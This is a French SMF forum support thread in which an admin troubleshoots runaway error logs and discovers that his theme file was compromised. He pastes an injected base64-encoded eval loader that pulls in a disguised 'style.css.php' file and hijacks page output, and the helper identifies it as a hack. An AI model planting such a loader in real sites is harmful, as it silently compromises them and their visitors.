taille des log d'erreur délirant

Started by Pierrot du 68, January 03, 2010, 12:33:43 PM

Previous topic - Next topic

Pierrot du 68

Bonjour,

Bonne année à tous les sorciers du PHP et autres qui trainent par ici  ;)

Voici mon problème : mon forum est bloqué parce que les log d'erreurs prennent trop de places et font gonfler mon espace disque chez mon hébergeur (limité à 100Mo) .

Je suis obligé de faire le ménage toutes les semaines et mon hébergeur (1&1) mets environ 24 h pour faire réellement le ménage sur leurs serveurs .

Donc après ces fêtes , j'ai oublié d'y aller et là depuis ce matin , c'est mort , page blanche à cette adresse : http://www.est-team.fr/forum/index.php
:P

Le problème viendrait apparemment de la gestion des avatars vu la ligne de code affichée. Pourtant ces derniers sont correctement affichés sur le forum ....

Mon thème est "Precision" et ma version SMF est la 1.1.11

Peut-on m'expliquer ou faire le nécessaire pour moi ?

Merci d'avance pour votre aide  :)




maximus23

Bonjour,

Il faudrait au moins savoir le type d'erreurs reportés par les logs pour pouvoir au moins essayer de les réparer :) Au pire tu peux désactiver les logs en attendant :)

Pour ce qui est de la deuxième erreur revérifie tes paramètres d'accès vers ta bdd dans ton fichier settings.php :)

Pas de support par PM ou Courrier...Veuillez utiliser le forum pour vous avoir une réponse rapide à votre demande d'aide. Merci.
Amitiés et à Bientôt...
No support by PM or Mail...You will get better and faster responses in the support forums. Thank you.
Have a nice day...

Pierrot du 68

une fois que j'aurai accès à mon interface d'admin , on comment faire pour désactiver les logs ?

Je mettrai aussi les messages d'erreur .

Merci en tout cas  :)

maximus23

Bonjour,

J'ai pas de version 1 sous la main :) Il faut regarder dans ton admin > configuration quelque part dans le coin :)

Pas de support par PM ou Courrier...Veuillez utiliser le forum pour vous avoir une réponse rapide à votre demande d'aide. Merci.
Amitiés et à Bientôt...
No support by PM or Mail...You will get better and faster responses in the support forums. Thank you.
Have a nice day...

Pierrot du 68

ok , dès que j'ai la main je vérifierai cette option .


Pierrot du 68

#5
je viens d'essayer et maintenant j'ai ce message , ca a peut-être un rapport

: INSERT command denied to user 'dbo******'@'212.********' for table 'smf_settings'
/****/htdocs/forum/Sources/Subs.php
704

maximus23

Bonsoir,

Vérifie avec ton phpmyadmin de ton hébergement que tu as toujours accès à ta bdd :)

Pas de support par PM ou Courrier...Veuillez utiliser le forum pour vous avoir une réponse rapide à votre demande d'aide. Merci.
Amitiés et à Bientôt...
No support by PM or Mail...You will get better and faster responses in the support forums. Thank you.
Have a nice day...

Pierrot du 68

bon tout fonctionne mais les erreurs s'accumulent déjà . voici un exemple


maximus23

Bonjour,

Mets les erreurs reportées par le log de Smf on y verra plus clair :)

Les principales erreurs suffiront :)

Pas de support par PM ou Courrier...Veuillez utiliser le forum pour vous avoir une réponse rapide à votre demande d'aide. Merci.
Amitiés et à Bientôt...
No support by PM or Mail...You will get better and faster responses in the support forums. Thank you.
Have a nice day...

Pierrot du 68

#9
 ;) en voici quelques un

Appliquer le filtre: Afficher les messages d'erreurs pour ce membre seulement  Invité       Aujourd'hui à 12:39:52
Appliquer le filtre: Afficher les messages d'erreurs pour cette adresse IP seulement *******      Appliquer le filtre: Afficher les messages d'erreurs pour cette session seulement 45cf9c6******************
Appliquer le filtre: Afficher les messages d'erreurs pour cet URL seulement http://www.est-team.fr/forum/index.php?topic=2871.msg44663;boardseen
Appliquer le filtre: Montrer les erreurs qui ont un même message
8: Undefined variable: R04CB58866688F2FE57771583392B6A18
Fichier: /****/htdocs/forum/Themes/default/Login.template.php (eval?)
Ligne: 1
   
------------------------

Appliquer le filtre: Afficher les messages d'erreurs pour ce membre seulement  Invité       Aujourd'hui à 02:12:57
Appliquer le filtre: Afficher les messages d'erreurs pour cette adresse IP seulement ********      Appliquer le filtre: Afficher les messages d'erreurs pour cette session seulement 71d1e6b4*****
Appliquer le filtre: Afficher les messages d'erreurs pour cet URL seulement http://www.est-team.fr/forum/index.php?board=31.0
Appliquer le filtre: Montrer les erreurs qui ont un même message
8: Undefined index: HTTP_REFERER
Fichier: /********/htdocs/forum/Themes/default/MessageIndex.template.php (eval?)
Ligne: 1

maximus23

Bonjour,

Il faudrait déjà vérifier ce fichier : MessageIndex.template.php
Ligne: 1

et voir ce qu'il met en début de fichier :)

Pas de support par PM ou Courrier...Veuillez utiliser le forum pour vous avoir une réponse rapide à votre demande d'aide. Merci.
Amitiés et à Bientôt...
No support by PM or Mail...You will get better and faster responses in the support forums. Thank you.
Have a nice day...

Pierrot du 68

voici ce qu'il y'a  :o

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9rdW5kZW4vaG9tZXBhZ2VzLzQxL2QyNzI0MDY2ODMvaHRkb2NzL2ZvcnVtL1RoZW1lcy9kZWZhdWx0L21nYWxsZXJ5L2hzL291dGxpbmVzL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
<?php
// Version: 1.1; MessageIndex



c'est bizarre comme code nan ?  :)

maximus23

Bonsoir,

Ton site a été hacké. Tu dois vérifier tout tes fichiers et enlever cette ligne de code malsaine ... :)

Pas de support par PM ou Courrier...Veuillez utiliser le forum pour vous avoir une réponse rapide à votre demande d'aide. Merci.
Amitiés et à Bientôt...
No support by PM or Mail...You will get better and faster responses in the support forums. Thank you.
Have a nice day...

Pierrot du 68

 :o

comment c'est possible ? l'accès à mon hébergeur est "securisé" normalement ?

Enfin c'est super sympa de ta part de m'indiquer la solution  ;) mes membres commençaient à gueuler  ;D

Puis je faire les changements de fichiers à la volée dans Filezilla ou dois je mettre le site en mode maintenance ?

maximus23

Bonsoir,

Quand on travaille sur un serveur il vaut mieux le mettre en mode maintenance :)

Bon courage :)
Pas de support par PM ou Courrier...Veuillez utiliser le forum pour vous avoir une réponse rapide à votre demande d'aide. Merci.
Amitiés et à Bientôt...
No support by PM or Mail...You will get better and faster responses in the support forums. Thank you.
Have a nice day...

Pierrot du 68

oui , y'a du taf  :-\

mais bon , peut-on empêcher que ca se reproduise ?

maximus23

Bonjour,

Cela date de la version 1.1.7 si mes souvenirs sont bon. Tu dois avoir été hacké avant la mise à jour vers la version suivante de l'époque. Logiquement le problème est résolu :)

Pas de support par PM ou Courrier...Veuillez utiliser le forum pour vous avoir une réponse rapide à votre demande d'aide. Merci.
Amitiés et à Bientôt...
No support by PM or Mail...You will get better and faster responses in the support forums. Thank you.
Have a nice day...

Pierrot du 68

bon ben voilà ca marche plus du tout , j'ai forcement merdé , vu que j'ai du texte qui s'affiche à la place de mon forum  :-[

http://www.est-team.fr/forum/index.php

help please

maximus23

Bonjour,

Ben oui tu as effacé les header php !!!

donc il manque ceci :

<?php

:)
Pas de support par PM ou Courrier...Veuillez utiliser le forum pour vous avoir une réponse rapide à votre demande d'aide. Merci.
Amitiés et à Bientôt...
No support by PM or Mail...You will get better and faster responses in the support forums. Thank you.
Have a nice day...

Pierrot du 68

c'est bon , apres une recherche sur google , j'ai trouvé tout seul , mais y'a encore plein de bug .

Dont celui là quand j'essaye de sauvegarder mon profil , je tombe sur une page blanche  :P

Advertisement: